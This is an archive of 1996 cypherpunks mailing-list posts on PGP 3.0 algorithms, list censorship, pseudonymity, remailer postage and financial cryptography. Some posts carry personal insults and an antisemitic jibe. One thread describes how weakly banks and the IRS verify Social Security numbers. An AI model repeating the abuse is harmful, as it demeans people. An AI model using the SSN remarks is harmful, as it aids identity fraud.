profitably control those assets) once only found at the top of large
industrial hierarchies like multinatioal corporations and nation states.
That information will be applied to smaller and smaller economic units as
processor prices continue to fall.

That is, large groups of the same ethnic nationality will be created on the
rubble of the old colonial boundries, which the cold war propped up for the
last 50 years. However, those large groups will continue to factionalize as
access to western-style economic activity increases. The continuing
ubiquity of the internet can only increase this process, especially if the
promise of financial cryptography survives the test of economic reality.

I expect that as financial technology like the above is introduced, the
ability of political and business elites to hold together large
hierarchical entities, like the modern nation-state or multinational
corporation, will continue to deminish. The ability for anyone to get paid
for their work, no matter where they are, and to work where they live,
probably in a peer-to-peer economic relationship with the buyer of their
work, who may well live on the other side of the world, will create much
less reliance on geography as capital, which were the hallmarks both
agrarianism and industrialism. Both of which, by the way, created cities,
and then the nation state, in the first place.

Whew. Clear as mud. Oh, well. Besides stirring things up more than a little
bit, does that answer your question?

;-).

Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@pgp.com>
Date: Wed, 13 Nov 1996 18:06:55 -0800 (PST)
To: coderpunks@toad.com
Subject: December Cypherpunks Meeting at PGP Inc.
Message-ID: <v03100700aeb01f4617c4@[205.180.136.70]>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks December Meeting Notice (1 of 3)

I'm pleased to announce that PGP Inc will be hosting December's Cypherpunks
physical meeting at our offices in Redwood Shores (mid-peninsula). We
really hope to see you here physically, both to present existing/new topics
and projects and also to briefly check out what we're doing.

If you want to mark your calendars in advance (there'll be two more
reminders), here's the basic info:

HOST:

 Pretty Good Privacy, Inc.  (Dave Del Torto)

TIME:

 14 December 96 (Saturday)
 12 Noon - 6 PM

LOCATION:

 Pretty Good Privacy, Inc.
 555 Twin Dolphin Drive
 Suite 570
 Redwood Shores CA 94065
 USA
  (directions will follow in the next reminder)

Please email me your presentation ideas as soon as possible so I can draw
up the agenda for everyone (including some idea of how much time you think
you'll need). We'll provide a fast TCP/IP hookup, a workstation
(Win95/Mac/UNIX) as needed, an RGB projection device, an overhead projector
for transparencies/etc, and any other reasonable equipment you might need
(assuming you warn us at least a week in advance).

Bagels/Chips will be provided by us, but bring your own beverages. We will
pause for a "keysigning moment" near the end of the meeting.

If anyone has any early questions, please contact me via email, telephone
or even PGPfone (by appointment). My key is available via the URL in the
header above.

   dave


________________________________________________________________________
Dave Del Torto                                      +1.415.65432.31  tel
Manager, Strategic Technical Evangelism             +1.415.631.0599  fax
Pretty Good Privacy, Inc.                        http://www.pgp.com  web






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 13 Nov 1996 15:33:17 -0800 (PST)
To: Dave Hayes <dave@kachina.jetcafe.org>
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <199611131951.LAA16239@kachina.jetcafe.org>
Message-ID: <Pine.LNX.3.95.961113180904.2109A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 13 Nov 1996, Dave Hayes wrote:

> Logically, we must conclude that those who frequently and repeatedly
> cry for the censorship or removal of any source of input from
> cyberspace are either:
> 
> 	-quite clueless about the tools at their disposal
> 	-ideologically or personally opposed to the source of input
> or	-in need of large amounts of attention from others

You are misinformed.  Vulis was _not_ prevented from posting to cpunks, thus
no source of input was removed.  He was simply removed from the distribution
list.  He can still read and post to the list.

> Idelological opposition is another matter entirely. To understand this
> better, we'll need to observe this in action. Here is an example:
> 
> >        Vulis portrays himself as a victim, but as I posted to the list
> >    last week, I disagree. Anyone who's spent any time on the
> >    100-plus-messages-a-day list can read for themselves the kind of nasty
> >    daily messages that came from Vulis's keyboard. 
> 
> "Nasty" is, of course, by this reporter's standard of "nasty". Granted
> this standard may in fact be shared by Mr. Gilmore, however a shared
> standard is not necessarily an appropriate or correct standard. 

The messages were, in addition to being "nasty", extremely off-topic.
"Off-topic" is much less subjective than "nasty".

> Notice how, once the opposition is admitted to, the rationalization
> begins. Suddenly this is not a matter of censorship, but of ownership.

That's because it is an issue of ownership and not of censorship for reasons
stated above.

> Just as suddenly, the classic anti-free-speech arguments of "if you
> don't like it, start yer own" begin to surface. (Anyone ever notice
> how this resembles the "love it or leave it" mentality of certain
> American patriotic organizations?)

Governments maintain a monopoly on land, so the "love it or leave it" mentality
is flawed.  Virtual space does not have the same limitations as physical
space.  Starting your own mailing list is relatively easy.

> Notice that the net is compared to a home or private club. Actually
> the net is neither, however that would not serve the purposes of this
> analogy, so this fact is convienently forgotton. 

Is the net analogous to a country?  If not, then why did you compare starting
a mailing list to moving to a different country?

> Value to whom and for what? If the editorial control produces one
> small element of the set of all ideologies, then this is only of value
> to the people who support this ideology. Given that the set of 
> people who support an issue is smaller than the set of people
> who support and oppose an issue, would the value not increase
> by allowing both sides of an issue equal speaking time? 

Even if this was an issue of preventing someone from posting, which it isn't,
this argument still doesn't hold up.  There is plenty of dispute about what
is on-topic on cypherpunks, but I doubt many people believe character
assassinations are very on-topic.  If someone wants to speak in favor of
Clipper or ITAR, then it would be wrong to censor this person.  However, if
a charter, whether formal or informal, is to even exist, then it should be
enforced.

> It is sad to note that this is the leader of one of America's
> forerunning organizations of freedom who says these words. For all
> *his* ideology of free speech, this statement reveals the hypocrasy he
> lives with for all to see. The true litmus test of free speech is to
> encounter speech that you *want* to censor.

The EFF protects against government censorship, not against "editorial
control", "censorship", or whatever else you want to call it.  I don't
see this as hypocritical at all.

> Mr. Gilmore, and other like minded parties, might want to consider
> what would happen if one parent company owned *all* communications
> media. Would they they be so supportive of the ideology of ownership
> and communciation they espouse?

And just how plausible do you think this is?  I believe it is next to
impossible, unless it is the result of government regulation.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMopa3SzIPc7jvyFpAQFzIggAr9nx5gd8J35wq5+UUUC9lHJD9hX7wcM+
DNRaZqRUlB/Dq4Xc0rbP7O4zSIob0QVbbQlZXylQcNwdCcb0wzMD2hkw8Xg31mHQ
s8jZwONGM8ljmg8aDSB1WuTsVnmrbcXGM/Jhmc+TPLjQxFQldONl6SGXIAQ58Vt8
DgunHoAZuR6AYWd64ssIFHSVzCR6bk4kL/QJ/0kGSr2x4FHJf62GhOrG/NguF3dd
85dXgUmoI2/f2B6SkfwbHPgZZhOGPgDt2rIPLo3S2JlhTYANSLhtA2souXQAz1bX
lfnEbxt4JNmy4zwT6m244VuuNtpFbF1OL1YAaZaU/WmUXTxeIohQYw==
=FbgX
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Wed, 13 Nov 1996 09:37:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: pgp3Re: pgp3
Message-ID: <199611131737.SAA05705@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


To: cypherpunks@toad.com
cc: ktk, prz@acm.org, colin, pgp@lsd.com
Subject: preliminary pgp 3.0 api document
Date: Sat, 11 Feb 95 17:30:55 -0800
From: Katy Kislitzin <ktk>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Wed, 13 Nov 1996 18:29:45 -0800 (PST)
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
Message-ID: <3.0b28.32.19961113183614.00b33c10@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:31 PM 11/12/96 -0800, Detweiler/VZ Nuri wrote:
>actually, there are some amusing things going on here with cpunk
>"rules." are cpunks in favor of pseudonyms or not? one famous
>cpunk madman wrote under a pseudonym to the list, and many
>cypherpunk went to great lengths to try to derive his identity.
>is this a case of respecting pseudonyms? or is it more a case of
>the double standard at best, hypocrisy at worst, 
>"respect my pseudonyms, but yours are fair game"?

You've neglected to mention that your (e.g., "the madman's") messages were
criticizing the use of pseudonyms, and the use of more than one identity by
an individual person. You've also neglected to mention that you (a single
person) were using multiple identities to argue that multiple identities
were harmful.

In general, you're conflating several positions:

1. Fluid identities (e.g., imprecise or unregulated mapping between
personas and flesh-and-blood bodies) cannot be prevented;

2. Fluid identities should be tolerated;

3. Fluid identities should be encouraged.
  
>one noted proponent of pseudonymity, whom we will merely call "Timmy", 
>regularly takes great glee in misattributing my own posts to some 
>deranged crackpot running loose in cyberspace. is this a case
>of respecting my identity? suppose I really was this person-- 
>shouldn't Timmy's position be one of respect for my use of
>a pseudonym?

I can't speak for Tim, but your messages do cause me to consider these
ethical questions - e.g., is it more important to focus on what you've
argued (that multiple identities are bad), or what you're doing (using
multiple identities), or on a "politeness" principle, e.g., that
gentle[wo]men don't reveal each other's identities.

Arguments about a "right to be pseudonymous" are as problematic as the
recent "free speech" arguments, where the identity of the right isn't so
much in question as is who it is enforceable against - e.g., I can't force
someone else to let me use their stuff to speak freely. Can I force someone
else (not only with law, but with appeals to morality or contract or
politeness or other forms of nongovernmental regulation) to address me by a
chosen pseudonym, or prevent them from linking multiple identities? 

I think there is (or should be) a "politeness norm" which limits linking
between identities, just as I see one which limits the disclosure of other
personal data; I don't give out other people's home phone numbers to third
parties, I don't pass along the identity of a person's "significant other"
or home address, and otherwise try to let each person choose how much they
want to disclose about their personal lives to the rest of the world. And I
hope that they will do the same for me. It's not especially unusual for
folks on the list to use abbreviated or pseudonymous identities; but the
"strength" of these is limited as we meet each other in person, do business
with each other, etc. It's difficult to form a strong relationship without
getting to know others, but it's difficult to preserve privacy and let
someone get to know you. A principle which preserves both values (privacy
and disclosure) seems useful.

But I also think that politeness norms are limited in their applicability -
in particular, I also think it's useful to subject other people to the
rules they propose should be applicable to everyone. This is a good way to
try out proposed rules, and in some cases to help people understand why
their rules are stupid. You have written that the use of pseudonyms and
multiple identities is wrong. So I think it's reasonable to expect you to
live up to the standards you've argued should be applied to all people. So
you don't get the benefit (at least from me) of the politeness norms about
pseudonyms. If you've changed your mind about the morality of
"pseudospoofing", by all means, let me know. 

I believe that you are familiar with the "subject others to their own
rules" rule, because it is the rule you're using/have used to justify your
use of multiple identities, hmm? 

>the basic
>cpunk philosophy, as amply illustrated by 2/3 of its founders, is
>"look out for #1 only, and don't waste time on something as
>inane as selfless public service or leadership"

I suspect you intended this as some sort of indictment, but I don't know if
you'll get a lot of disagreement (or even surprise). This philosophy seems
to be at the core of much libertarian thought and free-market economics,
two themes which are popular on the list. I think it's far too
old-fashioned to qualify as "cypherpunk", but you're in the wrong place if
you're hoping to insult someone by saying that. 

--
Greg Broiles                | "In this court, appellant and respondent are the
gbroiles@netbox.com         |  same person. Each party has filed a brief."
http://www.io.com/~gbroiles |  Lodi v. Lodi, 173 Cal.App.3d 628, 219 Cal.
                            |  Rptr. 116 (3rd Dist, 1985)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Lesher / hated by RBOC's in 5 states" <wb8foz@wauug.erols.com>
Date: Wed, 13 Nov 1996 15:56:48 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks)
Subject: Down-Under Bounce Attack halted
Message-ID: <199611132356.SAA31763@wauug.erols.com>
MIME-Version: 1.0
Content-Type: text/plain


The postmaster of that AU site running the bounce attack
assures me he has been able to vanquish the daemon running
the box in question; despite the fact he did not even know it was
there ;-} [Don't ask..]


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Wed, 13 Nov 1996 16:14:51 -0800 (PST)
To: FWJZ05A@prodigy.com
Subject: Re: take me off your mailing list
Message-ID: <961113191357_2080753704@emout12.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-11-13 18:35:35 EST, FWJZ05A@prodigy.com (CLERK PHILLIP
G ROBERTS) writes:

<< unsubcribe cypherpunks
  >>
Ok.. thisd is IT! Im going to start keeping a log of how many people actually
spell unsubscribe wrong. God.. I thought the average person was more
literate. Id HATE to ask these people how to spell wednesday or arkansas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 13 Nov 1996 19:43:58 -0800 (PST)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: PGP3.0 & ElGamal
In-Reply-To: <Pine.SUN.3.94.961113200754.4470C-100000@polaris>
Message-ID: <Pine.3.89.9611131930.A5464-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Nov 1996, Black Unicorn wrote:

> On Wed, 13 Nov 1996, Derek Atkins wrote:
> > The PGP 3.0 code that I've been working on has support for:
> > 	IDEA, 3DES
> > 	MD5, SHA1
> > 	RSA, DSS, ElGamal
> > 
> > It does not discontinue support for the PGP 2.6.2 algorithms.  It adds
> > support for new ones.
> 
> Absolutely outstanding.

I agree. Support for soon to be patent free algrithms is a good thing. I 
hope that in version 4.0, after the users had time to migrate to 
DSS/ElGamal, PGP will fully move away from RSA.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 13 Nov 1996 17:10:44 -0800 (PST)
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
In-Reply-To: <199611131722.RAA00682@server.test.net>
Message-ID: <Pine.SUN.3.94.961113200235.4470B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Nov 1996, Adam Back wrote:

> 
> Black Unicorn <unicorn@schloss.li> writes:

[Market discussion]

> > Why is use of the legal system any different?  If it is so wrong for me to
> > use the legal system as it stands, and if I am to be the subject of
> > criticism for the conduct, then aren't the critics imposing their moral
> > view on me?  Isn't this what libertarian cypherpunks dislike in the first
> > place?
> 
> The problem for me when people talk about suing people for slander in
> net discussions is that it involves governments and laws impinging on
> the internet.  Other examples of legislation interacting with the
> internet have been entirely negative: some people have called for
> legislation to stop "spamming", legislation to restrict pornography,
> "indecent speech", etc, etc The internet in my view is best off with
> the least possible government or legal interference.

Let's sum this up.  Government intervention via law suits is a bad thing.

[...]

> Now I'm sure the idea of slander law suits is to stop the slander,
> recompense for damages etc. but it is a thing prone to misuse, and
> balanced in favour of those with money.

And this:
Law suits (and thus government intervention) are prone to abuse.

> Someone who is using a nym, and for purposes including avoiding the
> possibility of frivolous law suits, to suggest suing someone who
> slanders this nym is not that productive I think.  The slanderer may
> also adopt the same strategy, and adopt their own nym!  

And this:
Use of law suits may expand the use of nyms.

> Nym sues nym.  I think not.  An alternate view of slander law suits is
> as a way to encourage the use of Nyms.  Certainly the dissenters of
> the unnamed pseudo religious have learnt the value of nyms, remailers
> and so forth.  There are distinct advantages to nyms.

You just made my argument for me.

Again, have to use the system to expose its flaws.

Same thing with privacy.  It is one thing to suggest that people respect
privacy because it is the "right thing to do."

Isn't it much more productive to make privacy unviolable from the
beginning via technology?

Readers might note that one of the result of my settlement agreement with
a certain flamer who decried the use of nyms (among other things) was this
flamer's eventual resort to the use of a nym.

Interesting lesson that, I believe.

You have to impose the price to get efficency.

> Adam
> --
> print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
> )]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 13 Nov 1996 17:09:51 -0800 (PST)
To: Derek Atkins <warlord@ATHENA.MIT.EDU>
Subject: Re: PGP3.0 & ElGamal
In-Reply-To: <199611131804.NAA26899@charon.MIT.EDU>
Message-ID: <Pine.SUN.3.94.961113200754.4470C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Nov 1996, Derek Atkins wrote:

> hi,
> 
> > > Also I understand, though there appears to be no available
> > > documentation saying as much, that pgp3.0 will not use RSA, nor IDEA,
> > > nor MD5, using instead El Gamal for public key encryption and
> > > signatures, 3DES (unsure?), and SHA1.
> > 
> > Can someone confirm that PGP3.0 will use ElGamal?
> 
> The PGP 3.0 code that I've been working on has support for:
> 	IDEA, 3DES
> 	MD5, SHA1
> 	RSA, DSS, ElGamal
> 
> It does not discontinue support for the PGP 2.6.2 algorithms.  It adds
> support for new ones.

Absolutely outstanding.

> 
> -derek
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 13 Nov 1996 20:08:50 -0800 (PST)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: PGP3.0 & ElGamal
In-Reply-To: <Pine.SUN.3.94.961113224825.7335F-100000@polaris>
Message-ID: <Pine.3.89.9611132026.A5464-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Nov 1996, Black Unicorn wrote:

> I'm still mildly curious as to why support for >128 bit keys is not
> available in any form I know of.

If you mean symmetric keys of >128 bits, the consensus of the experts is 
that even 128 bits are uncrackable by anyone's standard.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryondp@aol.com
Date: Wed, 13 Nov 1996 17:27:52 -0800 (PST)
To: dsmith@prairienet.org
Subject: Re: [TEST] [IGNORE] [NOISE]
Message-ID: <961113202708_1418929826@emout02.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


take me off this fucking list




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Wed, 13 Nov 1996 20:34:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dossier on Tim May is Easily Obtainable
Message-ID: <199611140434.UAA19210@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:11 PM 11/13/96 -0600, Rick Smith wrote:
...
>Records retrieved from [SOURCE DELETED] also show that the young Timothy
>Christopher May exploited his interest in physics for destructive purposes,
>like elaborate pranks involving fictious weaponry and national security
>information. [INFORMATION DELETED FOR NATIONAL SECURITY REASONS -- ORCON
>U31 -- OADR FOR RECLASSIFICATION]
>
>However, more careful investigators have uncovered evidence to suggest that
>this was not entirely a prank. Records from [SOURCE DELETED] indicate that
>the young Timothy Christopher May purchased a huge gap magnet from Edmund
>Scientific Company and also produced science fair project titled "Ball
>Lightning: A Stable Plasma?" Investigators suspect the timing of these
>events is not a coincidence.
...
Ball lightning?  Plasma weapon?  Could I have a copy of the schematics?
I've long been interested in obtaining (purchasing, building) a plasma
weapon.  (I'm also been interested in obtaining a EM pulse cannon, but
that's a different story.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: putney <putney@rigel.infonex.com>
Date: Wed, 13 Nov 1996 20:40:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Validating SSNs
Message-ID: <Pine.SOL.3.91.961113202851.18335A-100000@rigel.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


>At 4:13 PM 11/13/96, Black Unicorn wrote:

>>Exercise for the reader:  How does the bank verify SSNs?

>OK, I'll bite.

>My guess is that the bank sticks the SSN in a report to the IRS and the
>bank is happy with the SSN as long as the IRS doesn't complain about it.

>Now, does the IRS check? I suspect that they don't, either. Their objective
>is to look for "matches" with SSNs that show up on filed tax forms, since
>they want to verify the data on the tax form. Given the behavior of every
>other large database I've ever seen, I'd guess that there would be a huge
>number of SSNs that don't in fact associate with tax forms. If someone High
>Up hasn't decreed that they should chase such things down (and allocated
>heaps of money to do it), they'll ignore the mismatches.

>This seems consistent with the reports of people who use bogus SSNs for
>decades at a time.

>Rick.
>smith@sctc.com

Yup - You've got it right.  A bank's responsibility is to make the SSN 
match on tape with what the IRS has - thats it.  It was part of the big 
stink in the 80's when congress first said that all banks had to withhold 
on all interest, the banks yelled, and then the SSN match program was 
instituted.

There are significant fines for banks that do not follow up on 
mis-matches, or do not begin "back-up" withholding.  One person is no big 
deal, but they add up fast!

The IRS's job is to collect income so if the number matches with a filing 
then a-okay!

Yo.

Putney










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 13 Nov 1996 20:47:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: In case it isn't obvious
Message-ID: <Pine.GSO.3.95.961113203901.5151D-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


In case it isn't obvious, I respect the right of the freedom-knights folks
to do whatever they want on their mailing list. The list is theirs; they
can operate it as they please.

But perhaps I can show them the folly of their definitions of
"censorship." Kicking off someone who engages in personal attacks and
off-topic rants will usually improve, not hurt, the tenor of conversation
on the list. The tragedy of the commons and all.

In my experience, and I've talked about this at some length with Prof. 
Volokh who runs a number of lists himself, the best and most valuable
discussion lists are those that are unmoderated but have a list owner who
has the power to kick folks off a list and can try to steer the direction
of a conversation if it veers too far from the list's charter.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 13 Nov 1996 18:12:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
In-Reply-To: <199611130331.TAA28661@netcom11.netcom.com>
Message-ID: <8H2cXD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Vladimir Z. Nuri" <vznuri@netcom.com> writes:
> one noted proponent of pseudonymity, whom we will merely call "Timmy",
> regularly takes great glee in misattributing my own posts to some
> deranged crackpot running loose in cyberspace.

Correcttion: one of Timmy May's (fart) many stupid lies is his often-repeated
claim that V.Z.Nuri is a tentacle of one L.Detweiller. LD is no "deranged
crackpot" - he knows a lot more about cryptography and free speech than
net.scum like Timmy May (fart) and John "Hitler-like leader" Gilmore.

> of respecting my identity? suppose I really was this person--
> shouldn't Timmy's position be one of respect for my use of
> a pseudonym? of course he is too immature and feebleminded to

Ritalin-induced brain damage?

> even consider this discrepancy in his philosophy. cpunks are
> not known for having coherent philosophies that answer simple
> questions of actions in the face of quandaries. the basic
> cpunk philosophy, as amply illustrated by 2/3 of its founders, is
> "look out for #1 only, and don't waste time on something as
> inane as selfless public service or leadership"

Cypherpunks are full of shit.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 13 Nov 1996 18:11:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: New Linux-IPSEC mailing list for the S/WAN project
In-Reply-To: <847920468.54210.0@fatmans.demon.co.uk>
Message-ID: <6q2cXD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


paul@fatmans.demon.co.uk writes:
> > I've got more interesting things to do than read "deeper" into
> > your ignorant drivel.
>
> Can you say "fuckhead" ? - pull yourself together and get a life.
>
> Besides which I think one could hardly call my posts "ignorant
> drivel" given that the sum total of information in your own postings
> adds up to "Tim May is an Russian jew who knows nothing about
> cryptography".
>
> If you had more interesting things to do you would be doing them
> rather than posting off topic rants and lies to the cypherpunks list.

I don't think Timmy May is a Jew.  I think he's way too stupid to be
suspected of being a Jew.  Also he's make many anti-Semitic remarks.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Wed, 13 Nov 1996 20:54:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: "Messer im Kopf"
In-Reply-To: <v02140b01aead9ffb76fb@[192.0.2.1]>
Message-ID: <199611140454.UAA03027@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

 ph@netcom.com wrote:

 p> In the late 1970s Germany was in a limited state of turmoil due to
 p> fears of "terrorist" (1) groups, particularly the Baader-Meinhoff
 p> gang.  Around this time a curious incident occurred.  The German
 p> government had had some success in apprehending some gang leaders.  In
 p> response, the others hijacked a Lufthansa jet and demanded that the
 p> government release their friends.  Four of the leaders of the gang
 p> then died in prison.  The government declared these deaths to be
 p> suicides, but considerable doubt surrounds this claim.  The government
 p> certainly wanted to discourage further hijacking experiments.  The
 p> elimination of the gang leaders would certainly have sent a strong
 p> message.  The logic is compelling.  On the other hand, it is not
 p> inconceivable that the deaths were suicides intended to discredit the
 p> government.

I lived in the Netherlands and West Germany in 1970 (working as a
nightclub singer, no less!), also a time of terrorist activity and
mysterious deaths.

The persistent buzz was that West German intelligence set up the
terrorists to be hit by elements of the US Army's CID.  I do not know if
this is true or not, though nothing would surprise me after having
during the same period blundered into Kafkaesque personal conflicts with
major US intelligence players who were quite literally insane.

Proving the axiom that no plot device is to cheap for real life, fifteen
years later I was working as a tech in exec/diplo security, frequently
contracted to a huge - but low-profile - company whose name has been
inextricably linked to the CIA for the past forty years or so.  Much of
my job was doing wirework in the various safehouses they maintained,
some of which were enormous mansions kept to stash foreign dignitaries
if the need arose.  They maintained their own private security force
that was tacitly authorized to undertake special ops in any of the 83
host countries in which they operate.  They had their own EOD and
hostage negotiation/rescue teams that were frequently "in the field."
These were heavyweights recruited from some of the scariest outfits in
the world.

But, to get to the point of this shaggy-dog story, among the specific
threats we were tasked with intercepting were elements of the Red Army
Faction and Baader-Meinhof, both still considered to be dangerous as
late as the mid-'80s, though they never showed up in my AO during my six
years on the job (a Sikh separatist flap during the Golden Temple
episode was as close as I came to real action and it was a false alarm,
though pretty sphincter-tightening for about an hour as, due to a
fuckup, I was the first and only one on site, with nothing to protect me
but a digital multimeter and a farty little hip pocket .380 holding five
rounds).

What I wish to make clear in this discussion is that - to my direct
personal knowledge as a participant - there are innumerable deniable
assets that do the bidding of governments and corporate interests around
the world in the field of anti-terrorism.  These assets can _and do_
"handle" situations that the righteous citizen would assume to be the
exclusive purview of the CIA, Mossad, etc.  Though I had no direct
knowledge of such executive actions I, do not doubt that these
operations include "neutralization" of troublesome elements.

Fascinating damn gig.  Wish to hell I could write that book about it
without "creating problems" for myself.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMoqjDeV+ehVeCu2JAQGSHgQAp+w9zObP9ZQk2M44ZRK6J2wTl4lPaluw
p/QbBdtprzq2WTln4DS80rmpLTySgyLL3lG207H7Gm2PrkZzJExni4q4eRqzj4hS
QlalQG1O7vT3w566Hso9u17XcxKzq1DKcF8Ej5v/YQzv66YbjpauiGMyxUOe6TdD
Dwb5V2SD9Q4=
=fV1l
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Wed, 13 Nov 1996 21:00:52 -0800 (PST)
To: ph@netcom.com
Subject: RE: Remailer Abuse Solutions
Message-ID: <199611140459.UAA01890@crypt.hfinney.com>
MIME-Version: 1.0
Content-Type: text/plain


I had a similar thought a few months ago.  Actually with DigiCash there
is a specially nice feature from the point of view of the remailer.

Suppose the cash is embedded in the message headers itself.  The remailer
receives the message with the cash in it, turns it in at the bank to
make sure it is good, and withdraws a new blinded coin which it sticks
in the headers of the outgoing message.  The eventual recipient of that
message can then have his software turn in that coin and if it is good
that raises the priority of the message for him to read.

The nice thing is that if the recipient doesn't have the DigiCash software,
he will never cash the coin.  That means that the remailer can, after a
delay, reclaim uncashed coins for its own use.  It doesn't have to charge
postage explicitly, but it benefits as a middleman from unclaimed postage.

This would also of course encourage people to learn to use digital cash
so they could take advantage of these pennies from heaven in their
mailboxes.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 13 Nov 1996 21:05:14 -0800 (PST)
To: Declan McCullagh <declan@well.com>
Subject: Re: Censorship on cypherpunks?, from The Netly News
In-Reply-To: <Pine.GSO.3.95.961112093119.7009B-100000@well.com>
Message-ID: <328AA7B2.22EC@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Declan McCullagh wrote:
> The Netly News
> http://www.netlynews.com/
> November 11, 1996
> Cypher-Censored
> By Declan McCullagh (declan@well.com)
>        The cypherpunks mailing list, so legend goes, coalesced around two
>    principles: the dissemination of strong encryption and an absolute
>    commitment to free speech. It was a kind of crypto-anarchist utopia:
>    Here was a place where anonymity was encouraged and PGP-signed
>    postings were the norm -- and nobody seemed to be in control.
>        That is, until recently, when Dimitri Vulis was given the boot.
>    After he refused to stop posting flames, rants and uninspired personal
>    attacks, Vulis was summarily removed from the mailing list.

[snippo]

>        Vulis portrays himself as a victim, but as I posted to the list
